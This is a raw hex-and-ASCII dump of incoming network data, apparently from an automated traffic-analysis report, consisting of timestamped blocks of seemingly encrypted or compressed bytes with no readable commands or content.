              2022-01-14 10:25:31 UTC88INData Raw: 04 87 fe 62 a5 e2 a0 66 21 d6 b9 63 dc 7d 69 33 b0 0c 0d 86 0a d4 cf 72 eb 15 ee 39 33 d9 c1 dc 99 d7 2d a2 f9 57 82 f7 b6 c8 70 db 26 58 c4 fd bb 08 4d cf 1e 55 51 65 25 95 b3 3a b7 5a d8 b3 95 ce 87 f5 31 7a 3c 0d a3 c0 0f 46 95 05 f4 cf 2b 07 06 94 16 93 3d de a1 aa 98 06 ce 40 ac 50 1e 6d 69 80 9c 82 17 a1 24 53 75 05 f7 01 60 d3 48 e1 59 28 90 4c e0 b1 88 63 c6 6b 2c 2a f2 ee e2 56 31 a7 a9 b9 6e c9 12 71 20 32 30 29 08 2b d5 88 5d 0d 67 d3 ab db 27 c0 e7 f9 4c 9a be 1e 9a 57 5f 48 06 ff 87 19 14 5a d2 d9 30 c8 63 2a 37 86 69 40 ec e8 74 54 b6 e1 cf 21 d6 b8 1d a0 bd 50 97 d9 43 9b d3 51 0a cb fc 6c da b7 9c 25 23 28 45 7a 94 5e 39 7e fc 6f 24 54 2a c3 00 81 fa 78 68 41 5e c0 fb ec 77 f1 de bd 6b 3e 10 73 72 88 7b 86 4c 5d dd 4f 93 68 85 ed 04 8e ef
              Data Ascii: bf!c}i3r93-Wp&XMUQe%:Z1z<F+=@Pmi$Su`HY(Lck,*V1nq 20)+]g'LW_HZ0c*7i@tT!PCQl%#(Ez^9~o$T*xhA^wk>sr{L]Oh
              2022-01-14 10:25:31 UTC89INData Raw: 63 64 86 98 1e 7d ef 58 e7 fe 35 a3 3a a7 56 0a 9a 58 c7 59 02 92 53 70 5f e3 53 83 36 cb e8 04 fd 03 f6 79 0a 98 fe 3b e1 79 5b ab 5e 6d 52 bc eb f5 31 06 97 d2 cc a8 65 53 07 6d 27 02 f0 94 44 cc 40 7b c1 86 c8 d7 32 24 12 1a bb 3f ff ac 0c 1a 04 6e 6c 0f 96 2c 32 07 df 31 a8 db f1 70 57 c6 88 8e e3 c6 09 c0 0b 45 d4 ba 43 34 23 c9 41 4b 4b 13 27 18 64 bf 60 28 f6 77 64 5e 78 eb ec 6e 55 4b 6a bc 8c 85 3a c8 cc c1 6e c0 82 3d e2 ba 6e aa 04 87 59 f4 10 82 4f 6b 4d 6a b3 95 34 58 7b 79 f0 40 07 7b 0c 05 18 68 a4 c3 a3 3c 73 e7 6f be 8c 13 e3 85 b7 93 cf 8a c8 b7 35 0d a4 4b 9b 01 b0 63 46 e7 af f5 e3 34 e2 3f e2 bd 4f 74 85 f6 73 31 cf 5a de 02 89 e5 04 9f 63 73 04 69 cb fb e4 94 47 6c 9c d9 f1 7f e6 30 db 89 ea 6c 15 73 7f 98 30 28 5a d0 c8 db dd 9d be
              Data Ascii: cd}X5:VXYSp_S6y;y[^mR1eSm'D@{2$?nl,21pWEC4#AKK'd`(wd^xnUKj:n=nYOkMj4X{y@{h<so5KcF4?Ots1ZcsiGl0ls0(Z
              2022-01-14 10:25:31 UTC91INData Raw: b9 d2 44 05 f0 f2 60 c7 be ee 68 d1 58 a7 d3 4f 50 ea 9b d5 86 ca a1 05 98 29 73 8c 74 81 f9 10 b7 bf 62 a8 33 ca 3b 51 61 32 37 0a 83 e7 14 af 38 78 66 57 fb f4 73 07 5d 5f 43 9f ad ff ed 8b 37 87 e1 c0 2a 31 b1 99 d1 39 7c 7c 27 d7 21 dd 50 ff 41 03 0a 8e 97 52 94 b7 6e 06 83 ea 83 8c 2d 24 28 33 ac 88 68 b0 a0 99 ba 82 76 5f e5 04 89 54 71 78 45 ee d6 6a e2 bf 96 8b 42 77 f8 93 bc ee 93 c7 2e da 4f 5a c7 56 cc b5 64 04 80 01 60 dd a9 73 1e 4c 21 5c a2 fa de a9 a5 f9 9b 2b 5a fe 75 1f c9 38 e5 65 32 58 d3 14 7f f7 eb cf eb 65 f6 e6 e2 1c d5 42 12 61 b3 4f 61 32 4f 68 86 6b 3b 82 c5 c6 8c 30 9b a3 b7 9e 49 6b 84 18 63 39 29 13 98 8f 04 af 8e 5a c9 55 19 8d 93 d4 a7 a2 c2 95 d3 47 cc 71 61 f0 46 f3 ff 9d 0f 9d a3 a6 3c 40 56 38 20 15 71 37 1b 49 08 af 83
              Data Ascii: D`hXOP)stb3;Qa278xfWs]_C7*19||'!PARn-$(3hv_TqxEjBw.OZVd`sL!\+Zu8e2XeBaOa2Ohk;0Ikc9)ZUGqaF<@V8 q7I
              2022-01-14 10:25:31 UTC92INData Raw: 9c 3f 84 16 6a 9d ca c6 ef e4 dc dd 9c a6 57 9f ad e9 40 8d 0c 54 1b 7e d7 51 c7 38 98 b1 ff f7 e4 9e 34 78 ec 4d dc 91 83 f9 13 6d 42 83 13 16 7f e2 b2 95 c9 97 cc ad de 72 7f 07 17 e0 bd 67 3b ef 40 94 46 fb ea f4 7f 5a 75 0a 82 ce 6a d1 2a 3e 00 0d fa 6e 6a 08 f9 3d 04 c9 3b 70 21 be e0 08 0a 39 74 8a 77 01 f4 23 1f 7d 04 8c 7a 8e e9 25 9c 36 93 60 b3 98 51 78 a1 f3 bd 9b fb a4 bf ae df cf 4c 8b 15 f6 45 03 e7 01 ab 9c 47 79 0a 83 85 91 00 35 e8 9d a1 a9 bd 12 93 31 89 ff f9 e2 c7 90 63 79 e1 97 f1 0a 94 4b 79 22 23 c8 cd b1 d5 2d 5f b3 b2 11 e0 b3 f1 e0 6f 20 29 35 8a 07 90 ea 90 3c 05 77 0b 5c 4c f0 35 a5 d8 a5 0c bf 78 48 fc dc be 51 df 2f 6c b8 ca c8 92 b6 c8 c8 c0 c9 2b ad 84 bd e3 44 e7 ff c8 c9 5b 47 02 c1 6f 6e e0 f1 53 00 8d d4 6c b8 0e c8 4a
              Data Ascii: ?jW@T~Q84xMmBrg;@FZuj*>nj=;p!9tw#}z%6`QxLEGy51cyKy"#-_o )5<w\L5xHQ/l+D[GonSlJ
              2022-01-14 10:25:31 UTC93INData Raw: 9a a6 70 00 71 f4 41 9c 2c 3f 95 1d ac 08 80 b2 9f d1 16 03 08 4f ae 06 91 18 c4 f1 60 23 06 af ed 0a 64 20 4f 71 d8 1f a9 ea f5 fc 24 fd f9 eb ca 7d 0e 0f 0c 0a 1c 28 20 09 ab 99 d3 f8 d1 2d f0 a1 a3 a1 a3 af f1 b1 96 4f dd 87 fb 91 37 2d 99 d0 de ac 63 2a 5b e1 3c 16 9d 51 59 46 f4 76 f7 f8 68 95 c0 e0 ec f8 88 87 a9 a0 35 b5 e2 50 5c f1 7a 91 5b 3e 0b e7 fe dd b0 63 d4 b8 32 77 6e dd 25 e9 6d 34 3a ec 30 17 9a a4 ee b4 50 8a 19 f6 e9 7b 1b d9 83 5c 10 ba a1 d6 fb fe 2d 43 c4 f2 bc 78 ad 4e 3a ce 4b 23 c9 c4 f1 10 65 2a 47 87 ae 6e 86 05 0c d1 2c 36 39 ea f7 b4 08 8d b6 1d da 77 b2 65 98 5a cc c5 77 4a b9 2f 55 7b 5b e5 30 6f 10 33 34 38 f9 4b b0 4e a5 2f a0 94 39 7c 87 5d 51 d6 ba f9 ec e4 fb 16 21 aa f2 bd 72 f9 94 dc 85 f3 2d 8c 73 0d 40 ac 7b c4 47
              Data Ascii: pqA,?O`#d Oq$}( -O7-c*[<QYFvh5P\z[>c2wn%m4:0P{\-CxN:K#e*Gn,69weZwJ/U{[0o348KN/9|]Q!r-s@{G
              2022-01-14 10:25:31 UTC95INData Raw: d8 6c 19 94 bd 33 8c ed 56 a4 fd 9c b0 51 72 7e f5 e7 e5 c4 eb 8b cc 5d 66 80 d9 04 10 95 8a eb f5 b9 00 45 3e 07 e7 a0 4d b3 c2 87 26 db 5e 48 c3 87 88 53 be 93 db 01 be 2d 9f 33 85 dd b8 16 d5 4b 9e 64 d4 39 e4 fd bf eb f7 9e d1 89 ee 6f a2 4b 8b 83 95 26 03 7a 73 44 13 0a dd 3e a5 12 67 3c 02 8a 77 fa 78 72 86 6d 16 e5 15 7e 13 f5 1d d1 cf 40 61 40 e7 c9 40 16 55 4d 9f 1b 7a 9e 21 df c9 05 01 f7 6d af 70 0f 4d 2b 56 86 66 22 60 c6 1d a0 22 ba d7 36 0e fd c8 3b d7 29 18 ce cc 2c fa 70 77 2e ef 38 7a ac f1 be fd e7 1b c4 7c 2c 99 c8 ce d1 af e9 1e b7 7b 6f d2 18 a0 68 4a f4 d6 85 e5 fa a8 22 a3 1c 47 86 ce c4 c7 d9 9c dd 74 8d 52 dd 4d f2 9c 70 9c d7 44 12 d1 e2 a2 37 b6 12 98 e5 82 7b 13 f8 86 d4 d8 42 c8 c7 b3 05 cd 17 04 ee 82 86 3d 94 f0 bf 73 e2 ae
              Data Ascii: l3VQr~]fE>M&^HS-3Kd9oK&zsD>g<wxrm~@a@@UMz!mpM+Vf"`"6;),pw.8z|,{ohJ"GtRMpD7{B=s
              2022-01-14 10:25:31 UTC96INData Raw: c5 1a 18 2d ae 1b c5 11 f2 6e 4d b1 f5 1e 16 05 67 a4 15 59 ca cd e1 07 5e d5 88 48 ae 73 60 c2 ef 78 91 cf 43 88 3c 4c a1 1c 43 7e 2c 6a de 43 90 28 60 ca 00 f1 04 93 33 e4 f4 8e 8a 06 17 e5 70 5b e6 c0 f1 b8 af d7 39 99 a0 5d 54 dc a6 2d fe 35 e4 00 ed a8 53 c0 70 51 8d a8 7f 05 6d c9 56 65 26 8e a6 51 13 0e c9 2c 5d 36 dd 66 d5 05 e8 1a 4b fa 53 bf ce 59 ee 39 2f 11 54 6d 87 51 d1 fb 2b 1e ec b3 4a 4e 28 80 d5 f7 da 0c c2 6a cb f9 47 4f 0c 02 f9 92 c0 5e f3 8d a7 f0 c4 71 ad b0 4b 35 ea d0 61 c1 46 ae 53 24 0e de 11 d2 89 b4 41 c1 b3 32 02 de f8 2e 7c 5a 6c a6 76 cb 19 b3 28 84 68 e9 4a a3 fd 74 2f b2 87 61 c8 0d 60 7e 85 7d 8d 0a 0d 62 7c 9b 13 3c c5 e8 0f 4f 7a 5a 1b 57 8e eb 1c da fc 73 1a bf b7 85 95 6b 5d 2d 6b 2a 3c 71 81 84 09 a6 c9 3b fb 44 72
              Data Ascii: -nMgY^Hs`xC<LC~,jC(`3p[9]T-5SpQmVe&Q,]6fKSY9/TmQ+JN(jGO^qK5aFS$A2.|Zlv(hJt/a`~}b|<OzZWsk]-k*<q;Dr
              2022-01-14 10:25:31 UTC97INData Raw: c9 1c 3e eb 31 63 1a 4a e2 8a 13 c5 a2 0d 78 3b 00 41 8e 38 da a5 61 00 f0 7c b8 c7 63 32 3e 3d e8 a5 6d 1d c4 28 94 84 9b a1 d3 83 40 a1 e1 b7 d8 fa f1 3f b5 e3 c3 79 76 78 dc d1 9d 9c 87 fd b4 61 bc 93 b6 f1 18 0d 3c ce 9a 3a df a9 e9 69 e6 51 3d 84 b8 7b 42 02 3e 14 00 40 b6 b2 28 73 2c 70 d0 68 94 31 5d 40 bc e8 f5 fc 68 ac 62 e9 ef 8a 06 0f f6 f8 5d e1 71 5f 0c 3c 05 0c db 26 58 37 32 86 6b 5f 4b e9 e0 be 37 9c ac 1b 79 f7 c0 62 8d 28 24 fa 8a 9c 5d 5d 43 96 51 81 4b 0d e2 bc eb 06 31 18 71 09 15 e8 94 df 01 9f 1a b6 f9 f3 e0 b6 19 84 d3 a7 ae 00 83 ef 18 1b 7b e3 39 90 41 97 dd 38 31 59 d4 b4 b6 3e 13 ea 8d 16 e8 f8 c0 28 19 ed 1c 46 fc dd cd b6 10 66 bc fd f0 6b c2 63 37 9d a8 36 d7 d7 30 21 da a3 a4 eb e7 f9 7f f3 f1 0a 9a f9 fe 66 b7 82 a9 00 1c
              Data Ascii: >1cJx;A8a|c2>=m(@?yvxa<:iQ={B>@(s,ph1]@hb]q_<&X72k_K7yb($]]CQK1q{9A81Y>(Ffkc760!f
              2022-01-14 10:25:31 UTC99INData Raw: 4b e7 f9 c0 ad 0e 7d 05 28 89 28 23 a9 40 02 53 7d 69 2e 23 d1 c6 47 25 c0 f1 13 f0 fe 81 18 75 07 1e 4f 1b 8d 26 87 e9 1d ce df 29 44 16 69 39 65 4f 08 dd 2d a9 bb 7d 76 61 f0 8c 0d fb 96 36 31 b2 5f 50 ff e7 1d 32 c1 68 a0 3b 97 b0 f5 90 49 1b c2 f5 92 50 e1 ce b4 6b d0 0e 77 65 d5 f1 10 17 ae 09 60 c3 e0 88 65 20 e5 87 61 86 c5 e9 cf ae a9 b5 fd fa b1 99 d1 55 b2 7e 98 a0 f2 6a a0 dc 09 72 e3 40 75 17 3a 09 17 e3 ec 16 10 d6 a0 30 2b a4 d9 15 b3 2c e7 bf 94 7b 40 92 90 87 ed fd 13 ae 62 4a d6 2e d9 a8 1a 67 4f 93 c9 99 db 3f ee 96 44 49 60 a8 22 54 39 5b 51 6a af 8b ba e3 47 d1 81 eb 0d f1 10 79 12 78 8e 45 72 53 c6 89 bc fe 05 03 16 69 65 54 de b0 a9 0e 64 d8 40 e7 1c 4d 7e 82 18 7b 56 4a e4 99 25 7b 74 5f ee ee 71 da a8 2e 32 37 55 73 4d 0e c6 93 46
              Data Ascii: K}((#@S}i.#G%uO&)Di9eO-}va61_P2h;IPkwe`e aU~jr@u:0+,{@bJ.gO?DI`"T9[QjGyxErSieTd@M~{VJ%{t_q.27UsMF
              2022-01-14 10:25:31 UTC100INData Raw: 91 96 12 90 21 80 20 a9 9b 84 d1 d8 82 3f 34 fa f4 87 05 70 64 a1 5d 8c 14 a1 b1 e0 c1 8e 09 79 4b 23 dc e5 07 62 cf 40 aa 13 fe 76 e4 92 f1 1f df 2b 46 71 74 c2 44 14 db 72 9c 27 ce d0 3c 14 6c aa d1 d5 36 3d 04 ea d9 54 c7 b7 8f d8 b8 fd ff 57 e4 41 80 1e 57 a1 a4 28 22 aa d9 4c 2e 9c 53 a3 8e 1f 8e d5 d7 ae a8 04 c3 75 4b 7e 11 32 1d 89 fe e7 0e d1 fe 68 e5 0a cf 54 79 b2 09 57 4e f4 67 d0 03 04 78 36 21 36 e4 94 bd b7 8b 25 cf 42 5c af 32 6b 34 3a 13 a0 d9 f7 d2 a0 3c af 87 eb 13 a3 b7 2d f9 f1 00 94 19 9c 75 f8 10 b1 8a 99 d9 2d ad cc d9 d4 7e b5 f7 95 d5 a2 2d b6 12 bb a6 51 20 01 f8 50 a9 7e bd a5 70 6f 04 bd b8 8c 45 14 88 66 0b f3 10 6f 33 be 0c c5 03 99 68 c9 3c cd 61 a2 fb 2b 4f a9 6c 48 38 e4 77 a8 c5 9d 79 fc 84 c0 14 90 9d 54 3b 57 a3 41 4e
              Data Ascii: ! ?4pd]yK#b@v+FqtDr'<l6=TWAW("L.SuK~2hTyWNgx6!6%B\2k4:<-u-~-Q P~poEfo3h<a+OlH8wyT;WAN
              2022-01-14 10:25:31 UTC101INData Raw: bc 66 bc f1 03 fb 03 ea 9d af 9e f2 da a0 ef 3c 5b 5b a8 59 5f 30 d3 fc 72 56 db 2e 4c 1b 1d d6 b0 45 71 1d c7 b9 cb 19 f2 6b 30 eb 93 b0 5e ac fb 21 dd 50 9d d9 39 29 bc ef 0b 35 07 7f 8f da c9 43 9b c4 84 96 ab e0 b6 0a 83 8d 3e 77 f5 30 98 3c f7 0c c6 fc 7b 12 15 88 0a 8d 25 10 76 93 60 6f a7 6a 0a f0 3e d3 4d 6c b8 e6 5e 47 9a af c9 4f 7c 8f 3d 55 2f be ee 92 22 35 d0 c6 86 75 0a 87 0d 04 c8 ca c8 cf 3d f1 07 1d c7 46 e0 59 a1 ca db 3a 1c b7 36 67 23 cb 40 6d 52 85 ea f9 c0 fc 77 ff 51 33 b9 63 22 15 5d 2d f8 66 49 c6 26 3f 78 72 5a cf 43 94 2d c6 9b 25 3d e5 04 98 4f 17 98 34 57 4a 09 20 50 e3 91 78 3b 5b ec 51 e0 5b a2 16 6c b1 87 11 44 94 55 4a e5 e4 29 b1 e8 f5 87 f9 51 72 9b dc 5b bc b9 72 97 dc ca a1 d0 ce 07 24 47 6b 57 21 c7 3b b2 00 82 cc 4c
              Data Ascii: f<[[Y_0rV.LEqk0^!P9)5C>w0<{%v`oj>Ml^GO|=U/"5u=FY:6g#@mRwQ3c"]-fI&?xrZC-%=O4WJ Px;[Q[lDUJ)Qr[r$GkW!;L
              2022-01-14 10:25:31 UTC103INData Raw: ae 37 9a 57 e5 84 0c b5 9e 20 3a a5 16 76 80 6d cf 86 eb 72 8e 5f 29 c2 ec 86 fa 78 93 63 91 b7 c4 a4 68 47 4f 23 66 fa df cb 9a a7 c7 20 a4 73 ec 97 2b a6 32 38 f4 c3 17 b7 ed f1 72 6c cd 32 52 f5 ec 9e 36 2b 7a 18 0c f1 51 94 14 1f 34 ef 79 72 ff f8 c3 5f 5f 41 4a 5e a4 73 57 12 9a 76 d5 d5 b6 b4 73 e7 65 33 c4 99 bd 62 78 86 70 86 ab 34 4e 22 e1 75 3d 7d 93 a3 15 19 cc ca c1 73 40 60 85 22 bf 0b 92 36 79 6e a8 c6 e8 88 66 0b 53 0a 66 0f e4 7d b3 24 51 76 9b a0 46 89 e3 39 b4 0c 67 dc f8 77 85 f0 dc 50 5f 28 d2 38 d4 de be e7 f8 15 1f ba 19 50 83 b8 02 e0 db cc 1d b0 6b 58 d9 22 50 ee 96 85 56 be 16 a9 2b a3 af 8d 6e 3b c8 6d d2 75 01 f3 19 4d 65 32 3e 78 f3 86 76 b3 a1 a9 ae f5 30 47 b2 a3 d7 f7 50 be 93 61 4b 75 45 6a 11 f8 77 56 a8 df e6 40 09 04 98
              Data Ascii: 7W :vmr_)xchGO#f s+28rl2R6+zQ4yr__AJ^sWvse3bxp4N"u=}s@`"6ynfSf}$QvF9gwP_(8PkX"PV+n;muMe2>xv0GPaKuEjwV@
              2022-01-14 10:25:31 UTC104INData Raw: 3a 12 e2 d3 ab 73 3b 85 fb f9 86 82 8c 47 71 03 05 73 14 c3 7b 1a 4f 88 a4 90 62 bb 68 a7 63 9a 40 6b 22 e1 3b 83 ea 77 d8 b1 e2 ad 47 7b 1b ce 7c 2c 5c cb f1 6d cd 2f be 88 87 55 6f 33 b2 13 94 4c 18 6a b8 1c b8 fd 2f 90 4b 71 0a 3d 03 0f 8d c2 1f de b1 95 37 69 0c 65 27 c0 8f c2 ad 97 ce d7 d0 07 07 12 17 16 85 c8 c9 55 4f 12 c4 4a 75 6b 37 8d ad 9c 63 34 30 37 21 6c cb 14 2a c7 60 9f 19 8d 37 42 2c d7 40 ff f8 b5 87 95 b3 97 c7 3f 59 f4 32 31 b3 85 e8 f3 15 14 7e 88 7f e3 5d ed ca d2 d6 af 85 e3 6c 51 d5 41 92 56 ce c9 f6 6b 33 b4 f3 a3 cf a0 2d 51 0f ea e7 4b 0e 05 77 b7 02 82 65 31 aa 1a 44 a2 0c 67 22 8a cc bf bb d9 b9 6f f6 e0 fa 89 c2 aa b1 77 af 88 93 6f 2a 55 10 75 10 68 a1 49 98 50 f2 6a bc 8e 12 6c d4 be e4 be da a4 3d 59 c6 84 cc 43 08 ab 61
              Data Ascii: :s;Gqs{Obhc@k";wG{|,\m/Uo3Lj/Kq=7ie'UOJuk7c407!l*`7B,@?Y21~]lQAVk3-QKwe1Dg"owo*UuhIPjl=YCa
              2022-01-14 10:25:31 UTC105INData Raw: 4a f8 72 98 a3 f2 15 25 64 c0 5a 0e fe 74 ce d4 87 9f e9 6f d2 2b a6 2b b6 12 01 73 19 a6 18 73 0e c5 c6 84 70 25 92 35 4e 2b bd 64 b8 0e 1c 3c 12 c3 54 c3 73 f9 0a 98 44 09 1d b2 13 23 cd 5e d9 92 0a 85 e1 21 9b 25 3c d6 bc fb ff fc 93 1f d0 c4 f0 95 b6 18 ba fd fc 66 5a 35 16 76 87 e4 9c 49 17 fe c8 d1 47 68 7a 15 8e dd 8f b2 cc 74 80 63 20 20 04 98 bb 95 d9 25 d2 d0 99 a5 d5 42 03 0e 76 8f 1e c3 6d d9 88 a8 26 5e cb 54 a3 d3 40 16 5c dd 25 94 3e 58 a9 b8 00 ac 06 83 13 c0 26 e2 db 4c 4a cc 8e 47 04 67 d0 c8 cd 4f 7a f1 03 34 33 b8 19 25 63 3e f3 3e b6 07 12 60 d7 4f 1b cb 89 ca c6 f2 bf e4 f2 b6 0b 92 06 e3 ed 19 f8 62 b1 d6 cb 4f 7b 1f 2a c2 f2 66 a5 b9 1d 27 bc 95 a1 cc c2 ea 80 6a a7 15 4c 82 b6 9c 43 31 34 34 2a 38 e1 e6 fd 81 85 ff cc e6 82 7e 3c
              Data Ascii: Jr%dZto++ssp%5N+d<TsD#^!%<fZ5vIGhztc %Bvm&^T@\%>X&LJGgOz43%c>>`ObO{*f'jLC144*8~<
              2022-01-14 10:25:31 UTC107INData Raw: 05 1d 17 4d eb c7 c9 06 e4 d6 db 28 7b 1c 4d 7e 45 dc cb 00 86 39 fa 2f d7 2e 14 b8 15 f8 3f 8c 3a 7c de dd 29 1a 89 fc 66 72 0f 87 09 c7 de ca c2 ee ce 58 c2 f2 72 83 ba aa bb f5 55 15 af 0c 95 27 d6 36 82 d3 2f 4f 6e 19 e4 e0 a3 b4 10 16 b3 2a 6e b8 05 0e 7f 8b 09 f7 e4 92 5b 5e a2 ee 39 9f b8 18 64 b4 a0 8d ca d8 a2 29 b9 31 49 f6 7a 97 d3 57 5d f1 35 b8 13 03 58 bf 25 b3 6c 5f 4b 67 23 d9 46 9d b9 2c 12 66 a5 7c 12 0d 08 7c 91 ce c0 f7 89 1b 33 b2 1f d3 47 06 f7 b1 68 71 1b d4 dd 33 af 34 1a 51 6c f6 74 67 ff ed 09 0a 97 ba 07 ee 81 94 4e f3 92 23 c7 b0 31 b8 13 b7 92 ac f1 27 c7 5a d2 bc 01 79 e7 98 52 84 97 38 30 3c 14 6d 46 83 9d 16 de a7 a2 8e ff e0 a3 01 64 bb 79 c5 c6 87 21 5a 95 d2 87 0d da f6 d8 eb 00 e6 83 e4 e8 97 12 59 47 7c 55 79 b8 96 2e
              Data Ascii: M({M~E9/.?:|)frXrU'6/On*n[^9d)1IzW]5X%l_Kg#F,f||3Ghq34QltgN#1'ZyR80<mFdy!ZYG|Uy.
              2022-01-14 10:25:31 UTC108INData Raw: 15 f4 76 28 66 e1 86 8b 8f 29 f0 8d c4 14 86 a8 b4 77 c7 8c 81 b9 92 c6 d2 c9 9f 62 11 77 fa 13 be f0 26 6a 01 90 37 16 4e 00 3c fb 1f 74 88 38 e6 a3 a5 61 c0 9f 42 48 c6 93 0b 0f ca 6d 21 c9 97 73 d5 53 bb dc e0 4c 26 ba 70 54 83 37 3f ae 38 35 56 1b 27 98 18 45 16 67 a9 d0 f1 9f ac eb bc 3a c7 8e 86 3f 4e 75 48 d0 cb 06 90 97 20 79 79 2f a2 3c 4e 40 f6 07 ee 94 1a 3d 3c de 4d df ce a5 55 6e 2f f1 85 d6 bd b5 21 5b ea eb f7 a7 f9 cb 2a 9a 2f 88 24 41 6a 1f ef bb 8f 08 0d 9c 0b d9 06 ed d3 a1 96 87 6a 30 78 a8 83 72 d4 f5 95 e4 4a cc 39 48 22 64 14 6e 20 b5 15 9e 88 1a ac 0a e5 98 c2 a8 66 7f 40 a0 38 68 77 b0 17 c3 72 60 34 a5 85 ce ba ff a1 bd f9 d6 47 80 1d f6 ce 3d 60 a9 7f 3e 69 a1 bd b0 db 68 35 56 58 6e 7d 2a d1 14 1d 77 07 4e af c1 0a 11 9c 93 00
              Data Ascii: v(f)wbw&j7N<t8aBHm!sSL&pT7?85V'Eg:?NuH yy/<N@=<MUn/![*/$Ajj0xrJ9H"dn f@8hwr`4G=`>ih5VXn}*wN
              2022-01-14 10:25:31 UTC109INData Raw: c1 8e ca 68 b4 13 02 25 c0 17 87 9d 5e 2a 17 5f 46 e1 cf f4 64 58 ab fc 8e b5 25 7e 86 6f c9 eb 08 db 2d 52 0f 5f 84 65 3f ff 9e 63 3b 91 4f 61 58 d4 06 27 bc b1 2b 09 71 a7 98 06 27 7c f8 93 ff ed 82 52 89 08 80 c7 5b 2c 57 b6 5b 33 f9 87 e9 49 8f d6 b5 f4 73 9c ce ce cf 35 bd fe b9 7f fe ee 1f 94 6e a3 4f 6e de d5 bd ce cc 28 87 e3 cd e6 98 ab 1d d9 dd 9e 3d 7b be f9 11 41 79 6b 35 be 80 87 0f 0c 06 93 ce a8 b1 38 31 ac 1e 40 0a 23 70 89 82 7d 16 67 28 d7 67 21 d0 24 46 48 5d 3b 56 c4 ba 92 18 22 41 bd 90 21 e5 7e fe 6f c3 85 e7 01 6c a8 a4 c0 f4 6c 1b 75 74 9d 8f 8e 1f 25 e1 7e 12 90 64 e6 b1 8b 52 0f a0 41 f5 5b 56 7c 9e b4 60 26 41 36 38 73 1f d1 55 31 f1 d0 5a 85 e7 1d cc d7 59 b5 64 aa 16 75 06 f3 a5 42 ce d6 a1 a5 a2 24 27 ef 05 17 56 4f 09 03 50
              Data Ascii: h%^*_FdX%~o-R_e?c;OaX'+q'|R[,W[3Is5nOn(={Ayk581@#p}g(g!$FH];V"A!~ollut%~dRA[V|`&A68sU1ZYduB$'VOP
              2022-01-14 10:25:31 UTC111INData Raw: b4 ea c2 3c fe 22 c0 e6 a7 e7 0a 9b a4 33 8a de a1 ab e7 0f b3 fd f5 f8 21 a1 c1 6a 1c e6 8a 73 65 27 e8 57 46 e8 f7 f1 60 18 67 31 d6 a8 92 22 58 c8 bf 71 b0 14 7d 04 ed 11 60 cd 4f 76 f5 e5 eb 0a 83 e9 7a 93 32 28 23 da d6 be 1b de b6 1a 20 4d 16 03 0a 8e 9c 90 de 14 f0 e2 d5 55 5d 0f 95 03 b2 10 11 fd e0 e7 78 33 30 eb 62 a1 af c4 97 74 34 31 c6 ff fb b3 e6 7e 77 22 46 f9 fe d3 7f ba 80 ea 57 84 16 76 91 da aa 05 10 22 0d b9 24 e2 40 eb 21 a1 18 c5 bb 90 9c 5d a8 2b 53 dc ce a8 55 18 85 2b d6 45 8d e6 80 67 2a d8 75 05 c5 7e e2 2c bb 92 9d c7 33 b9 65 87 49 3c 47 7e a8 c2 7d 3f dd 05 58 c3 9d 76 8e ad f4 6a 10 6e bd 8e 4c f7 79 55 b8 72 ff 9e c0 57 48 98 48 e0 c8 d9 1c bd c5 0e 25 fd ad 9f d4 dd 93 f0 8a 64 40 f5 9e 47 62 a8 2c 87 f0 57 c8 17 4f 0d 49
              Data Ascii: <"3!jse'WF`g1"Xq}`Ovz2(# MU]x30bt41~w"FWv"$@!]+SU+Eg*u~,3eI<G~}?XvjnLyUrWHH%d@Gb,WOI
              2022-01-14 10:25:31 UTC112INData Raw: f6 20 3c 6d 2a 23 f6 75 17 0f 48 98 19 f6 13 a8 79 16 37 87 ba 8a 78 97 a4 76 94 1b cc 82 7b 5a cf 37 3d 83 3e 18 65 29 5a 0b 80 2b a2 6d 28 80 ed 13 e0 6d 83 46 38 b1 d2 d0 83 ae c0 47 33 e4 41 7d 70 cf 57 13 9d d6 f0 9e 41 da aa 9f 23 d0 cc 64 2e 4e 2f 30 a1 90 a2 48 93 31 18 68 45 19 ad 96 1f ca a2 83 59 32 4c 95 8e 40 d1 d1 5c d0 0b 5d 35 2b 99 7a 29 d0 3c 86 25 98 05 ec 23 88 c8 e6 e1 d0 d0 02 93 b7 7f 49 08 e5 e3 6a d5 31 ec 78 58 ad 70 24 43 fe 82 0c 43 f4 a8 33 fd 9f fe 8e 01 19 83 19 a4 29 5c 75 17 72 27 f3 94 48 e1 33 41 d9 1e bc a4 28 c1 36 24 a0 67 26 a7 ed 1e 48 96 dd 23 d0 0a 20 38 aa b5 00 fd 0a 81 9b a3 d6 aa 89 7b 04 8b 26 d2 b8 c8 42 8c 15 12 13 9f d4 c1 a4 8d c5 7d cb c7 3a 5a 94 8c c3 2d 5e f3 ba 6e f9 ba 64 b8 1b db 33 e7 fc 43 da 22
              Data Ascii: <m*#uHy7xv{Z7=>e)Z+m(mF8G3A}pWA#d.N/0H1hEY2L@\]5+z)<%#Ij1xXp$CC3)\ur'H3A(6$g&H# 8{&B}:Z-^nd3C"
              2022-01-14 10:25:31 UTC116INData Raw: d1 af df 5f 97 5a 16 f3 80 0c 1f 27 7b a9 44 c0 cb b1 30 08 6a 15 dc 48 4c ca 32 e8 a1 4f d5 7b ef c2 cb a8 97 de d1 3b c8 de d5 06 21 70 31 c9 2d 1d 6b 8e 4c f1 21 11 ef 05 e1 e5 ab 58 74 9c 49 15 f7 d9 f1 9a 21 03 a3 b8 0e 6e 47 2f 75 0b c2 01 24 85 cb 0b 75 ea 2c 43 d4 de e6 96 34 31 94 9a d9 4d a3 04 cc 9f 5c 0c 6b 4c 10 15 ed e2 6a bb 81 39 8e 39 7c 34 0e 8e 9e 20 a4 ec fc 11 0b a2 31 a0 1c 9e a8 42 c0 48 a2 82 96 39 8b 0c cd 4a 85 8e 3c 11 50 45 64 a5 4d a0 3b c3 66 4c 90 f0 e2 c2 41 8d 09 00 9a a2 96 54 d3 a6 2b 56 62 c5 1d 86 7d 56 cd 30 49 7e 6d 58 c7 45 84 2c 57 31 a9 8b 28 a3 73 50 ab 07 11 eb 19 fe 21 38 2e 79 a7 ea 8d 3e ba 5a b4 73 0c 33 30 2f b6 f2 1a b4 7b 62 db 60 cc 98 51 04 ea 8b a6 48 e6 84 f3 6c d8 ed 56 56 47 24 b2 28 7d a7 9d c1 94
              Data Ascii: _Z'{D0jHL2O{;!p1-kL!XtI!nG/u$u,C41M\kLj99|4 1BH9J<PEdM;fLAT+Vb}V0I~mXE,W1(sP!8.y>Zs30/{b`QHlVVG$(}
